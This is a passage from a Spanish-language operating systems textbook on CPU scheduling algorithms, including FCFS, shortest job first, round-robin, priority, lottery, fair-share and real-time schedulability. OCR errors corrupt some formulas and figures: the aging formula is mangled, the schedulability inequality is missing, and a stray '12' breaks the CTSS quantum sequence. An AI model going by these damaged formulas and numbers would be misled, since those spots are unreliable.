excelente (muchos trabajos cortos por hora), pero a expensas de un terrible tiempo de retorno para 
los trabajos largos. Si los trabajos cortos llegaran a un tiempo bastante estable, los trabajos largos 
tal vez nunca se ejecutarían, con lo cual el tiempo de respuesta promedio se volvería infinito, a la 
vez que se lograría un rendimiento alto. 

La utilización de la CPU se emplea a menudo como métrica en los sistemas de procesamien¬ 
to por lotes. En realidad, no es una buena métrica. Lo que importa es cuántos trabajos por 
hora salen del sistema (rendimiento) y cuánto tiempo se requiere para obtener un trabajo de vuel¬ 
ta (tiempo de retorno). Con la utilización de la CPU como métrica es como clasificar a los autos 
con base en cuántas veces por hora gira el motor. Por otro lado, es útil poder detectar cuando el 
uso de la CPU está llegando a 100%, para saber cuándo es momento de obtener más poder de 
cómputo. 

Para los sistemas interactivos se aplican distintas metas. La más importante es minimizar el 
tiempo de respuesta; es decir, el tiempo que transcurre entre emitir un comando y obtener el resul¬ 
tado. En una computadora personal en la que se ejecuta un proceso en segundo plano (por ejemplo, 
leer y almacenar correo electrónico de la red), una petición del usuario para iniciar un programa o 
abrir un archivo debe tener precedencia sobre el trabajo en segundo plano. Hacer que todas las pe¬ 
ticiones interactivas se atiendan primero se percibirá como un buen servicio. 

Una cuestión algo relacionada es lo que podría denominarse proporcionalidad. Los usuarios 
tienen una idea inherente (pero a menudo incorrecta) acerca de cuánto deben tardar las cosas. Cuan¬ 
do una petición que se percibe como compleja tarda mucho tiempo, los usuarios aceptan eso, pero 
cuando una petición que se percibe como simple tarda mucho tiempo, los usuarios se irritan. Por 
ejemplo, si al hacer clic en un icono que empieza a enviar un fax el sistema tarda 60 segundos en 
completar la oración, el usuario probablemente aceptará eso como un gaje del oficio, debido a que 
no espera que un fax se envíe en 5 segundos. 

Por otro lado, cuando un usuario hace clic en el icono que interrumpe la conexión telefónica 
una vez que se ha enviado el fax, tiene diferentes expectativas. Si no se ha completado después de 
30 segundos, es probable que el usuario esté sumamente enojado y después de 60 segundos estará 
echando espuma por la boca. Este comportamiento se debe a la percepción común de los usuarios 
de que se SUpone que hacer una llamada telefónica y enviar un fax requiere mucho más tiempo que 
sólo colgar el teléfono. En algunos casos (como éste) el planificador no puede hacer nada acerca del 
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tiempo de respuesta, pero en otros casos sí puede, en especial cuando el retraso se debe a una ma¬ 
la elección en el orden de los procesos. 

Los sistemas de tiempo real tienen propiedades distintas de los sistemas interactivos y por en¬ 
de diferentes metas de planificación. Se caracterizan por tener tiempos límite que deben (o debe¬ 
rían) cumplirse. Por ejemplo, si una computadora está controlando un dispositivo que produce datos 
a un paso regular, al no ejecutar el proceso de recolección de datos a tiempo se podría perder infor¬ 
mación. Por ende, la principal necesidad en un sistema de tiempo real es cumplir todos los tiempos 
límite (o la mayoría). 

En algunos sistemas de tiempo real, en especial los que involucran el uso de multimedia, la pre- 
dictibilidad es importante. No es fatal fallar en un tiempo límite, pero si el procesador de audio se 
ejecuta con muchos errores, la calidad del sonido se deteriorará con rapidez. El video también cuen¬ 
ta, pero el oído es mucho más sensible a la perturbación que el ojo. Para evitar este problema, la 
planificación de procesos debe ser altamente predecible y regular. En este capítulo estudiaremos los 
algoritmos de planificación de procesamiento por lotes e interactivos, pero aplazaremos la mayor 
parte de nuestro estudio de la planificación de tiempo real para cuando analicemos los sistemas ope¬ 
rativos multimedia en el capítulo 7. 

2.4.2 Planificación en sistemas de procesamiento por lotes 

Ahora es tiempo de pasar de las cuestiones de planificación en general a los algoritmos de planifi¬ 
cación específicos. En esta sección analizaremos los algoritmos que se utilizan en sistemas de pro¬ 
cesamiento por lotes. En las siguientes secciones examinaremos los sistemas interactivos y de 
tiempo real. Vale la pena aclarar que algunos algoritmos se utilizan tanto en los sistemas de proce¬ 
samiento por lotes como interactivos. Más adelante estudiaremos estos algoritmos. 

Primero en entrar, primero en ser atendido 

Probablemente el más simple de todos los algoritmos de planificación es el de tipo primero en 
entrar, primero en ser atendido (ECES, F irst-C orne, F irst-Served) no apropiativo. Con este algo¬ 
ritmo, la CPU se asigna a los procesos en el orden en el que la solicitan. En esencia hay una sola 
cola de procesos listos. Cuando el primer trabajo entra al sistema desde el exterior en la mañana, se 
inicia de inmediato y se le permite ejecutarse todo el tiempo que desee. No se interrumpe debido a 
que se ha ejecutado demasiado tiempo. A medida que van entrando otros trabajos, se colocan al fi¬ 
nal de la cola. Si el proceso en ejecución se bloquea, el primer proceso en la cola se ejecuta a con¬ 
tinuación. Cuando un proceso bloqueado pasa al estado listo, al igual que un trabajo recién llegado, 
se coloca al final de la cola. 

La gran fuerza de este algoritmo es que es fácil de comprender e igualmente sencillo de pro¬ 
gramar. También es equitativo, en el mismo sentido en que es equitativo asignar los escasos bole¬ 
tos para eventos deportivos o conciertos a las personas que están dispuestas a permanecer en la línea 
desde las 2 a.m. Con este algoritmo, una sola lista ligada lleva la cuenta de todos los procesos lis¬ 
tos. Para elegir un proceso a ejecutar sólo se requiere eliminar uno de la parte frontal de la cola. Pa¬ 
ra agregar un nuevo trabajo o desbloquear un proceso sólo hay que adjuntarlo a la parte final de la 
cola. ¿Qué podría ser más simple de comprender y de implementar? 
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Por desgracia, el algoritmo tipo “primero en entrar, primero en ser atendido” también tiene una 
importante desventaja. Suponga que hay un proceso ligado a los cálculos que se ejecuta durante 1 
segundo en cierto momento, junto con muchos procesos limitados a E/S que utilizan poco tiempo 
de la CPU, pero cada uno de ellos tiene que realizar 1000 lecturas de disco para completarse. El 
proceso limitado a los cálculos se ejecuta durante 1 segundo y después lee un bloque de disco. Aho¬ 
ra se ejecutan todos los procesos de E/S e inician lecturas de disco. Cuando el proceso limitado a 
los cálculos obtiene su bloque de disco, se ejecuta por otro segundo, seguido de todos los procesos 
limitados a E/S en una rápida sucesión. 

El resultado neto es que cada proceso limitado a E/S llega a leer 1 bloque por segundo y reque¬ 
rirá 1000 segundos para completarse. Con un algoritmo de planificación que se apropió del proce¬ 
so limitado a los cálculos cada 10 mseg, los procesos limitados a E/S terminarían en 10 segundos 
en vez de 1000 segundos y sin quitar mucha velocidad al proceso limitado a los cálculos. 

EI trabajo más corto primero 

Ahora analicemos otro algoritmo de procesamiento por lotes no apropiativo, que supone que los 
tiempos de ejecución se conocen de antemano. Por ejemplo, en una compañía de seguros las perso¬ 
nas pueden predecir con bastante precisión cuánto tiempo se requerirá para ejecutar un lote de 1000 
reclamaciones, ya que se realiza un trabajo similar cada día. Cuando hay varios trabajos de igual 
importancia esperando a ser iniciados en la cola de entrada, el planificador selecciona el trabajo 
más corto primero (SJF, Shortest j ob F i rst). Analice la figura 2-40. Aquí encontramos cuatro tra¬ 
bajos (A, B, C y D) con tiempos de ejecución de 8, 4, 4 y 4 minutos, respectivamente. Al ejecutar¬ 
los en ese orden, el tiempo de respuesta para A es de 8 minutos, para B es de 12 minutos, para C es 
de 16 minutos y para D es de 20 minutos, para un promedio de 14 minutos. 
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Figura 2-40. Un ejemplo de planificación tipo el trabajo más corto primero, (a) Eje¬ 
cución de cuatro trabajos en el orden original, (b) Ejecución de cuatro trabajos en el 
orden del tipo “el trabajo más corto primero”. 


Ahora consideremos ejecutar estos cuatro trabajos usando el trabajo más corto primero, como 
se muestra en la figura 2-40(b). Los tiempos de respuesta son ahora de 4, 8, 12 y 20 minutos, para 
un promedio de 11 minutos. Probablemente sea óptimo el algoritmo tipo el trabajo más corto pri¬ 
mero. Considere el caso de cuatro trabajos, con tiempos de ejecución de a, b, C y d, respectivamen¬ 
te. El primer trabajo termina en el tiempo a, el segundo termina en el tiempo a -F b, y así en lo 
sucesivo. El tiempo promedio de respuesta es (4a + 3b + 2c + d)/4. Está claro que a contribuye 
más al promedio que los otros tiempos, por lo que debe ser el trabajo más corto, con b a continua¬ 
ción, después C y por último d como el más largo, ya que sólo afecta a su tiempo de retorno. El mis¬ 
mo argumento se aplica con igual facilidad a cualquier número de trabajos. 
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Vale la pena observar que el trabajo más corto primero es sólo óptimo cuando todos los traba¬ 
jos están disponibles al mismo tiempo. Como ejemplo contrario, considere cinco trabajos (del A al 
E) con tiempos de ejecución de 2, 4, 1, 1 y 1, respectivamente. Sus tiempos de llegada son 0, 0, 3, 
3 y 3. Al principio sólo se pueden elegir A o B, ya que los otros tres trabajos no han llegado toda¬ 
vía. Utilizando el trabajo más corto primero, ejecutaremos los trabajos en el orden A, B , C, D, E pa¬ 
ra un tiempo de espera promedio de 4.6. Sin embargo, al ejecutarlos en el orden B, C, D, E, A hay 
una espera promedio de 4.4. 

EI menor tiempo restante a continuación 

Una versión apropiativa del algoritmo tipo el trabajo más corto primero es el menor tiempo res¬ 
tante a continuación (SRTN, Shortest Remaining Time Next). Con este algoritmo, el planificador 
siempre selecciona el proceso cuyo tiempo restante de ejecución sea el más corto. De nuevo, se de¬ 
be conocer el tiempo de ejecución de antemano. Cuando llega un nuevo trabajo, su tiempo total se 
compara con el tiempo restante del proceso actual. Si el nuevo trabajo necesita menos tiempo para 
terminar que el proceso actual, éste se suspende y el nuevo trabajo se inicia. Ese esquema permite 
que los trabajos cortos nuevos obtengan un buen servicio. 


2.4.3 Planificación en sistemas interactivos 

Ahora analizaremos algunos algoritmos que se pueden utilizar en sistemas interactivos. Estos algo¬ 
ritmos son comunes en computadoras personales, servidores y en otros tipos de sistemas también. 

Planificación por turno circular 

Uno de los algoritmos más antiguos, simples, equitativos y de mayor uso es el de turno circular 
(round-robin). A cada proceso se le asigna un intervalo de tiempo, conocido como quántum, du¬ 
rante el cual se le permite ejecutarse. Si el proceso se sigue ejecutando al final del cuanto, la CPU 
es apropiada para dársela a otro proceso. Si el proceso se bloquea o termina antes de que haya trans¬ 
currido el quántum, la conmutación de la CPU se realiza cuando el proceso se bloquea, desde lue¬ 
go. Es fácil implementar el algoritmo de turno circular. Todo lo que el se realizador necesita es 
mantener una lista de procesos ejecutables, como se muestra en la figura 2-41(a). Cuando el proce¬ 
so utiliza su quántum, se coloca al final de la lista, como se muestra en la figura 2-41(b). 

La única cuestión interesante con el algoritmo de turno circular es la longitud del quántum. 
Para conmutar de un proceso a otro se requiere cierta cantidad de tiempo para realizar la adminis¬ 
tración: guardar y cargar tanto registros como mapas de memoria, actualizar varias tablas y listas, 
vaciar y recargar la memoria caché y así sucesivamente. Suponga que esta conmutación de pro¬ 
ceso o conmutación de contexto (como algunas veces se le llama) requiere 1 mseg, incluyendo 
el cambio de los mapas de memoria, el vaciado y recarga de la caché, etc. Suponga además que el 
quántum se establece a 4 mseg. Con estos parámetros, después de realizar 4 mseg de trabajo útil, 
la CPU tendrá que gastar (es decir, desperdiciar) 1 mseg en la conmutación de procesos. Por ende. 


SECCIÓN 2.4 


PLANIFICACIÓN 


155 


Proceso Siguiente 

actuai proceso 



Proceso 

actuai 



(a) (b) 

Figura 2-41. Planificación de turno circular, (a) La lista de procesos ejecutables. 

(b) La lista de procesos ejecutables una vez que B utiliza su quántum. 

20 por ciento de la CPU se desperdiciará por sobrecarga administrativa. Sin duda, esto es dema¬ 
siado. 

Para mejorar la eficiencia de la CPU, podríamos establecer el quántum a (por decir) 100 mseg. 
Ahora el tiempo desperdiciado es sólo de 1 por ciento. Pero considere lo que ocurre en un sistema 
servidor si llegan 50 peticiones dentro de un intervalo de tiempo muy corto y con requerimientos 
muy variables de la CPU. Se colocarán cincuenta procesos en la lista de procesos ejecutables. Si la 
CPU está inactiva, el primero empezará de inmediato, el segundo tal vez no inicie sino hasta 100 
mseg después y así en lo sucesivo. El último desafortunado tal vez tenga que esperar 5 segundos 
para poder tener una oportunidad, suponiendo que los demás utilizan sus quántums completos. La 
mayoría de los usuarios percibirán como lenta una respuesta de 5 segundos a un comando corto. Es¬ 
ta situación es muy mala si algunas de las peticiones cerca del final de la cola requirieron sólo unos 
cuantos milisegundos de tiempo de la CPU. Con un quántum corto, hubieran obtenido un mejor ser¬ 
vicio. 

Otro factor es que si al quántum se le asigna un tiempo más largo que la ráfaga promedio de la 
CPU, la apropiación no ocurrirá con mucha frecuencia. En vez de ello, la mayoría de los procesos 
realizarán una operación de bloqueo antes de que el quántum se agote, ocasionando una conmuta¬ 
ción de proceso. Al eliminar la apropiación mejora el rendimiento, debido a que las conmutaciones 
de procesos sólo ocurrirán cuando sea lógicamente necesario; es decir, cuando un proceso se blo¬ 
quee y no pueda continuar. 

La conclusión se puede formular de la siguiente manera: si se establece el quántum demasiado 
corto se producen demasiadas conmutaciones de procesos y se reduce la eficiencia de la CPU, pe¬ 
ro si se establece demasiado largo se puede producir una mala respuesta a las peticiones interacti¬ 
vas cortas. A menudo, un quántum con un valor entre 20 y 50 mseg constituye una solución 
razonable. 

Planificación por prioridad 

La planificación por turno circular hace la suposición implícita de que todos los procesos tienen 
igual importancia. Con frecuencia, las personas que poseen y operan computadoras multiusuario 
tienen diferentes ideas en cuanto a ese aspecto. Por ejemplo, en una universidad el orden jerárqui¬ 
co puede ser: primero los decanos, después los profesores, secretarias, conserjes y por último los 
estudiantes. La necesidad de tomar en cuenta los factores externos nos lleva a la planificación por 
prioridad. La idea básica es simple: a cada proceso se le asigna una prioridad y el proceso ejecu¬ 
table con la prioridad más alta es el que se puede ejecutar. 
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Incluso hasta en una PC con un solo propietario puede haber varios procesos, algunos de ellos 
más importantes que los demás. Por ejemplo, un proceso demonio que envía correo electrónico en 
segundo plano debería recibir una menor prioridad que un proceso que muestra una película de vi¬ 
deo en la pantalla en tiempo real. 

Para evitar que los procesos con alta prioridad se ejecuten de manera indefinida, el planifica¬ 
dor puede reducir la prioridad del proceso actual en ejecución en cada pulso del reloj (es decir, en 
cada interrupción del reloj). Si esta acción hace que su prioridad se reduzca a un valor menor que 
la del proceso con la siguiente prioridad más alta, ocurre una conmutación de procesos. De mane¬ 
ra alternativa, a cada proceso se le puede asignar un quántum de tiempo máximo que tiene permi¬ 
tido ejecutarse. Cuando este quántum se utiliza, el siguiente proceso con la prioridad más alta recibe 
la oportunidad de ejecutarse. 

A las prioridades se les pueden asignar procesos en forma estática o dinámica. En una compu¬ 
tadora militar, los procesos iniciados por los generales podrían empezar con una prioridad de 100, 
aquéllos iniciados por los coroneles con 90, los mayores con 80, los capitanes con 70, los tenien¬ 
tes con 60 y así sucesivamente. De manera alternativa, en un centro computacional comercial los 
trabajos con prioridad alta podrían costar $100 por hora, los de prioridad media $75 y los de prio¬ 
ridad baja $50 por hora. El sistema UNIX tiene un comando llamado nice, el cual permite a un 
usuario reducir de manera voluntaria la prioridad de su proceso, para que sea agradable a los otros 
usuarios. Nadie lo utiliza. 

El sistema también puede asignar las prioridades en forma dinámica para lograr ciertos objeti¬ 
vos. Por ejemplo, algunos procesos están muy limitados a E/S y gastan la mayor parte de su tiem¬ 
po esperando a que la E/S se complete. Cada vez que un proceso así desea la CPU, debe recibirla 
de inmediato para dejar que inicie su siguiente petición de E/S, que a su vez puede proceder en pa¬ 
ralelo con otro proceso que se encuentre realizando cálculos. Hacer que el proceso limitado a E/S 
espere mucho tiempo por la CPU sólo significa que estará ocupando memoria por un tiempo inne¬ 
cesariamente largo. Un algoritmo simple para dar buen servicio a los procesos limitados a E/S es 
establecer la prioridad a 1/f, en donde f es la fracción del último quántum que utilizó un proceso. 
Un proceso que sólo utilizó 1 mseg de su quántum de 50 mseg obtendría una prioridad de 50, mien¬ 
tras que un proceso que se ejecutara durante 25 mseg antes de bloquearse recibiría la prioridad 2 y 
un proceso que utilizara el quántum completo recibiría la prioridad 1. 

A menudo es conveniente agrupar los procesos en clases de prioridad y utilizar la planificación por 
prioridad entre las clases, pero la planificación por tumo circular dentro de cada clase. La figura 2-42 
muestra un sistema con cuatro clases de prioridad. El algoritmo de programación es el siguiente; mien¬ 
tras que haya procesos ejecutables en la clase de prioridad 4, sólo ejecutar cada uno por un cuanto, por 
tumo circular y nunca preocuparse por las clases con menor prioridad. Si la clase de prioridad 4 está 
vacía, entonces ejecutar los procesos de la clase 3 por tumo circular. Si las clases 4 y 3 están vacías, en¬ 
tonces ejecutar la clase 2 por tumo circular y así sucesivamente. Si las prioridades no se ajustan de ma¬ 
nera ocasional, todas las clases de menor prioridad pueden morir de hambre (sin tiempo de CPU). 

Múltiples colas 

Uno de los primeros planificadores por prioridad estaba en CTSS, el Sistema de tiempo comparti¬ 
do compatible del M.I.T. que se ejecutaba en la IBM 7094 (Corbató y colaboradores, 1962). CTSS 
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Encabezados Procesos ejecutables 

de las colas ._^_, 


(Prioridad más alta) 


(Prioridad más baja) 


Figura 2-42. Un algoritmo de planificación con cuatro clases de prioridad. 
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Prioridad 3 


Prioridad 2 


Prioridad 1 


tenía el problema de que la conmutación de procesos era muy lenta, debido a que la 7094 sólo po¬ 
día contener un proceso en la memoria. Cada conmutación de procesos ocasionaba intercambiar 
(SWapping) el proceso actual al disco y leer uno nuevo del disco. Los diseñadores de CTSS se die¬ 
ron cuenta rápidamente de que era más eficiente dar a los procesos limitados a CPU un quántum 
largo de vez en cuando, en vez de darles quántums pequeños con frecuencia (para reducir el inter¬ 
cambio). Por otro lado, al proporcionar a todos los procesos un quántum largo se obtendría un tiem¬ 
po de respuesta pobre, como ya hemos visto. Su solución fue la de establecer clases de prioridades. 
Los procesos en la clase más alta se ejecutaban durante un quántum. Los procesos en la siguiente 
clase más alta se ejecutaban por dos quántums. Los procesos en la siguiente clase se ejecutaban por 
cuatro quántums, y así sucesivamente. Cada vez que un proceso utilizaba todos los quántums que 
tenía asignados, se movía una clase hacia abajo en la jerarquía. 

Como ejemplo, considere un proceso que necesita realizar cálculos en forma continua durante 
100 quántums. Al inicio recibe un quántum y después se intercambia con otro proceso en disco. La 
siguiente vez recibirá dos quántums antes de que se vuelva a intercambiar. En las siguientes ejecu¬ 
ciones obtendrá 4, 8, 12, 16, 32 y 64 quántums, aunque habrá utilizado sólo 37 de los 64 quántums 
finales para completar su trabajo. Sólo 7 intercambios (incluyendo la carga inicial) se requerirán, en 
vez de 100, si se utiliza sólo un algoritmo por turno circular. Lo que es más, a medida que el pro¬ 
ceso se hunde más y más en las colas de prioridad, se ejecutará con cada vez menos frecuencia, 
guardando la CPU para procesos cortos e interactivos. 

La siguiente política se adoptó para evitar que un proceso, que requería ejecutarse durante un 
tiempo largo cuando empezó por primera vez pero se volvió interactivo más adelante, fuera casti¬ 
gado para siempre. Cada vez que se escribía un retorno de carro (tecla Intro o Enter) en una termi¬ 
nal, el proceso que pertenecía a esa terminal se movía a la clase de mayor prioridad, con base en la 
suposición de que estaba a punto de volverse interactivo. Un buen día, algún usuario con un proce¬ 
so muy limitado a la CPU descubrió que con sólo sentarse en la terminal y teclear retornos de ca¬ 
rro al azar durante unos cuantos segundos, su tiempo de respuesta mejoraba en forma considerable. 
Se lo contó a todos sus amigos. Moraleja de la historia; llegar a lo correcto en la práctica es más di¬ 
fícil que en la teoría. 

Se han utilizado muchos otros algoritmos para asignar procesos a las clases de prioridades. Por 
ejemplo, el influyente sistema XDS 940 (Lampson, 1968) construido en Berkeley tenía cuatro cla¬ 
ses de prioridad: terminal, E/S, quántum corto y quántum largo. Cuando un proceso que había es¬ 
tado esperando la entrada de terminal por fin se despertaba, pasaba a la clase de mayor prioridad 
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(terminal). Cuando un proceso en espera de un bloque de disco pasaba al estado listo, se enviaba a 
la segunda clase. Cuando a un proceso que estaba todavía en ejecución se le agotaba su quántum, al 
principio se colocaba en la tercera clase. No obstante, si un proceso utilizaba todo su quántum dema¬ 
siadas veces seguidas sin bloquearse en espera de la terminal o de otro tipo de E/S, se movía hacia 
abajo hasta la última cola. Muchos otros sistemas utilizan algo similar para favorecer a los usuarios 
y procesos interactivos en vez de los que se ejecutan en segundo plano. 

EI proceso más corto a continuación 

Como el algoritmo tipo el trabajo más corto primero siempre produce el tiempo de respuesta 
promedio mínimo para los sistemas de procesamiento por lotes, sería bueno si se pudiera utilizar 
para los procesos interactivos también. Hasta cierto grado, esto es posible. Por lo general, los pro¬ 
cesos interactivos siguen el patrón de esperar un comando, ejecutarlo, esperar un comando, eje¬ 
cutarlo, etcétera. Si consideramos la ejecución de cada comando como un “trabajo” separado, 
entonces podríamos minimizar el tiempo de respuesta total mediante la ejecución del más 
corto primero. El único problema es averiguar cuál de los procesos actuales ejecutables es el 
más corto. 

Un método es realizar estimaciones con base en el comportamiento anterior y ejecutar el pro¬ 
ceso con el tiempo de ejecución estimado más corto. Suponga que el tiempo estimado por cada co¬ 
mando para cierta terminal es Tg. Ahora suponga que su siguiente ejecución se mide como T^. 
Podríamos actualizar nuestra estimación mediante una suma ponderada de estos dos números, es 
decir, aTg -t- (1 — ajT^. Por medio de la elección de a podemos decidir hacer que el proceso de 
estimación olvide las ejecuciones anteriores rápidamente o que las recuerde por mucho tiempo. Con 
a = 1/2, obtenemos estimaciones sucesivas de 

Tg, Tg/ 2 +Ti/ 2 , Tg/ 4 + Ti/ 4 + T2/2, Tg/8+ T1/8+ T2/4+T3/2 

Después de tres nuevas ejecuciones, el peso de Tg en la nueva estimación se ha reducido a 1 / 8 . 

La técnica de estimar el siguiente valor en una serie mediante la obtención del promedio pon¬ 
derado del valor actual medido y la estimación anterior se conoce algunas veces como envqeci- 
miento. Se aplica en muchas situaciones en donde se debe realizar una predicción con base en 
valores anteriores. En especial, el envejecimiento es fácil de implementar cuando a = 1/2. Todo lo 
que se necesita es sumar el nuevo valor a la estimación actual y dividir la suma entre 2 (mediante 
el desplazamiento de un bit a la derecha). 

Planificación garantizada 

Un método completamente distinto para la planificación es hacer promesas reales a los usuarios 
acerca del rendimiento y después cumplirlas. Una de ellas, que es realista y fácil de cumplir es: si 
hay n usuarios conectados mientras usted está trabajando, recibirá aproximadamente 1/n del poder 
de la CPU. De manera similar, en un sistema de un solo usuario con n procesos en ejecución, mien¬ 
tras no haya diferencias, cada usuario debe obtener 1/n de los ciclos de la CPU. Eso parece bastan¬ 
te justo. 
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Para cumplir esta promesa, el sistema debe llevar la cuenta de cuánta potencia de CPU ha te¬ 
nido cada proceso desde su creación. Después calcula cuánto poder de la CPU debe asignarse a ca¬ 
da proceso, a saber el tiempo desde que se creó dividido entre n. Como la cantidad de tiempo de 
CPU que ha tenido cada proceso también se conoce, es simple calcular la proporción de tiempo 
de CPU que se consumió con el tiempo de CPU al que cada proceso tiene derecho. Una proporción de 
0.5 indica que un proceso solo ha tenido la mitad del tiempo que debería tener, y una proporción 
de 2.0 indica que un proceso ha tenido el doble de tiempo del que debería tener. Entonces, el algo¬ 
ritmo es para ejecutar el proceso con la menor proporción hasta que se haya desplazado por deba¬ 
jo de su competidor más cercano. 

Planificación por sorteo 

Aunque hacer promesas a los usuarios y cumplirlas es una buena idea, es algo difícil de implementar. 
Sin embargo, se puede utilizar otro algoritmo para producir resultados similares con una implementa- 
ción mucho más sencilla. Este algoritmo se conoce como planificación por SOrteo (Waldspurger y 
Weihl, 1994). 

La idea básica es dar a los procesos boletos de lotería para diversos recursos del sistema, como 
el tiempo de la CPU. Cada vez que hay que tomar una decisión de planificación, se selecciona un 
boleto de lotería al azar y el proceso que tiene ese boleto obtiene el recurso. Cuando se aplica a la 
planificación de la CPU, el sistema podría realizar un sorteo 50 veces por segundo y cada ganador 
obtendría 20 mseg de tiempo de la CPU como premio. 

Parafraseando a George Orwell: “Todos los procesos son iguales, pero algunos son más igua¬ 
les que otros”. Los procesos más importantes pueden recibir boletos adicionales, para incrementar 
su probabilidad de ganar. Si hay 100 boletos repartidos y un proceso tiene 20 de ellos, tendrá una 
probabilidad de 20 por ciento de ganar cada sorteo. A la larga, recibirá un 20 por ciento del tiempo 
de la CPU. En contraste a un planificador por prioridad, en donde es muy difícil establecer lo que 
significa tener una prioridad de 40, aquí la regla es clara: un proceso que contenga una fracción f 
de los boletos recibirá aproximadamente una fracción f del recurso en cuestión. 

La planificación por lotería tiene varias propiedades interesantes. Por ejemplo, si aparece un 
nuevo proceso y recibe algunos boletos, en el siguiente sorteo tendrá la oportunidad de ganar en pro¬ 
porción al número de boletos que tenga. En otras palabras, la planificación por lotería tiene un alto 
grado de respuesta. 

Los procesos cooperativos pueden intercambiar boletos si lo desean. Por ejemplo, cuando un 
proceso cliente envía un mensaje a un proceso servidor y después se bloquea, puede dar todos sus 
boletos al servidor para incrementar la probabilidad de que éste se ejecute a continuación. Cuando 
el servidor termina, devuelve los boletos para que el cliente se pueda ejecutar de nuevo. De hecho, 
en ausencia de clientes, los servidores no necesitan boletos. 

La planificación por sorteo se puede utilizar para resolver problemas que son difíciles de mane¬ 
jar con otros métodos. Un ejemplo es un servidor de video en el que varios procesos están enviando 
flujos continuos de video a sus clientes, pero enviando sus cuadros a distintas velocidades. Suponga 
que el proceso necesita cuadros a 10, 20 y 25 cuadros por segundo. Al asignar a estos procesos 10, 
20 y 25 boletos, respectivamente, dividirán de manera automática el tiempo de la CPU en la propor¬ 
ción correcta aproximada; es decir: 10 : 20 : 25. 
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Planificación por partes equitativas 

Hasta ahora hemos asumido que cada proceso se planifica por su cuenta, sin importar quién sea su 
propietario. Como resultado, si el usuario 1 inicia 9 procesos y el usuario 2 inicia 1 proceso, con la 
planificación por turno circular o por prioridades iguales, el usuario 1 obtendrá 90 por ciento del 
tiempo de la CPU y el usuario 2 sólo recibirá 10 por ciento. 

Para evitar esta situación, algunos sistemas toman en consideración quién es el propietario de 
un proceso antes de planificarlo. En este modelo, a cada usuario se le asigna cierta fracción de la 
CPU y el planificador selecciona procesos de tal forma que se cumpla con este modelo. Por ende, 
si a dos usuarios se les prometió 50 por ciento del tiempo de la CPU para cada uno, eso es lo que 
obtendrán sin importar cuántos procesos tengan en existencia. 

Como ejemplo, considere un sistema con dos usuarios, y a cada uno de los cuales se les pro¬ 
metió 50 por ciento de la CPU. El usuario 1 tiene cuatro procesos (A, B, C y D) y el usuario 2 sólo 
tiene 1 proceso (E). Si se utiliza la planificación por turno circular, una posible secuencia de plani¬ 
ficación que cumple con todas las restricciones es; 

AEBECEDEAEBECEDE... 

Por otro lado, si el usuario 1 tiene derecho al doble de tiempo de la CPU que el usuario 2, podría¬ 
mos obtener la siguiente secuencia; 

AB EC DEAB EC DE ... 

Desde luego que existen muchas otras posibilidades, y se pueden explotar dependiendo de cuál 
sea la noción de equidad. 

2.4.4 Planificación en sistemas de tiempo real 

En un sistema de tiempo real, el tiempo desempeña un papel esencial. Por lo general, uno o más 
dispositivos físicos externos a la computadora generan estímulo y la computadora debe reaccionar 
de manera apropiada a ellos dentro de cierta cantidad fija de tiempo. Por ejemplo, la computadora 
en un reproductor de disco compacto recibe los bits a medida que provienen de la unidad y debe 
convertirlos en música, en un intervalo de tiempo muy estrecho. Si el cálculo tarda demasiado, la 
música tendrá un sonido peculiar. Otros sistemas de tiempo real son el monitoreo de pacientes en 
una unidad de cuidados intensivos de un hospital, el autopiloto en una aeronave y el control de ro¬ 
bots en una fábrica automatizada. En todos estos casos, tener la respuesta correcta pero demasiado 
tarde es a menudo tan malo como no tenerla. 

En general, los sistemas de tiempo real se categorizan como de tiempo real duro, lo cual sig¬ 
nifica que hay tiempos límite absolutos que se deben cumplir, y como de tiempo real SUave, lo cual 
significa que no es conveniente fallar en un tiempo límite en ocasiones, pero sin embargo es tole¬ 
rable. En ambos casos, el comportamiento en tiempo real se logra dividiendo el programa en varios 
procesos, donde el comportamiento de cada uno de éstos es predecible y se conoce de antemano. 
Por lo general, estos procesos tienen tiempos de vida cortos y pueden ejecutarse hasta completarse 
en mucho menos de 1 segundo. Cuando se detecta un evento externo, es responsabilidad del plani¬ 
ficador planificar los procesos de tal forma que se cumpla con todos los tiempos límite. 
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Los eventos a los que puede llegar a responder un sistema de tiempo real se pueden categorizar 
como periódicos (que ocurren a intervalos regulares) o aperiódicos (que ocurren de manera impre¬ 
decible). Tal vez un sistema tenga que responder a varios flujos de eventos periódicos. Dependien¬ 
do de cuánto tiempo requiera cada evento para su procesamiento, tal vez ni siquiera sea posible 
manejarlos a todos. Por ejemplo, si hay m eventos periódicos y el evento i ocurre con el periodo P ¡ 
y requiere C ¡ segundos de tiempo de la CPU para manejar cada evento, entonces la carga sólo se po¬ 
drá manejar si 


Se dice que un sistema de tiempo real que cumple con este criterio es planificable. 

Como ejemplo, considere un sistema de tiempo real con tres eventos periódicos, con periodos 
de 100, 200 y 500 mseg, respectivamente. Si estos eventos requieren 50, 30 y 100 mseg de tiempo de 
la CPU por evento, respectivamente, el sistema es planificable debido a que 0.5 -1-0.15 + 0.2 < 1. Si 
se agrega un cuarto evento con un periodo de 1 segundo, el sistema seguirá siendo planificable 
mientras que este evento no requiera más de 150 mseg de tiempo de la CPU por evento. En es¬ 
te cálculo está implícita la suposición de que la sobrecarga por la conmutación de contexto es tan 
pequeña que se puede ignorar. 

Los algoritmos de planificación en tiempo real pueden ser estáticos o dinámicos. Los primeros 
toman sus decisiones de planificación antes de que el sistema empiece a ejecutarse. Los segundos 
lo hacen durante el tiempo de ejecución. La planificación estática sólo funciona cuando hay infor¬ 
mación perfecta disponible de antemano acerca del trabajo que se va a realizar y los tiempos límite 
que se tienen que cumplir. Los algoritmos de planificación dinámicos no tienen estas restricciones. 
Aplazaremos nuestro estudio de algoritmos específicos hasta el capítulo 7, donde trataremos los sis¬ 
temas de multimedia en tiempo real. 


2.4.5 Política contra mecanismo 

Hasta ahora hemos supuesto tácitamente que todos los procesos en el sistema pertenecen a distin¬ 
tos usuarios y por lo tanto compiten por la CPU. Aunque esto es a menudo cierto, algunas veces su¬ 
cede que un proceso tiene muchos hijos ejecutándose bajo su control. Por ejemplo, un proceso de 
un sistema de administración de bases de datos puede tener muchos hijos. Cada hijo podría estar 
trabajando en una petición distinta o cada uno podría tener cierta función específica que realizar 
(análisis de consultas o acceso al disco, por ejemplo). Es por completo posible que el proceso prin¬ 
cipal tenga una idea excelente acerca de cuál de sus hijos es el más importante (o que requiere tiem¬ 
po con más urgencia) y cuál es el menos importante. Por desgracia, ninguno de los planificadores 
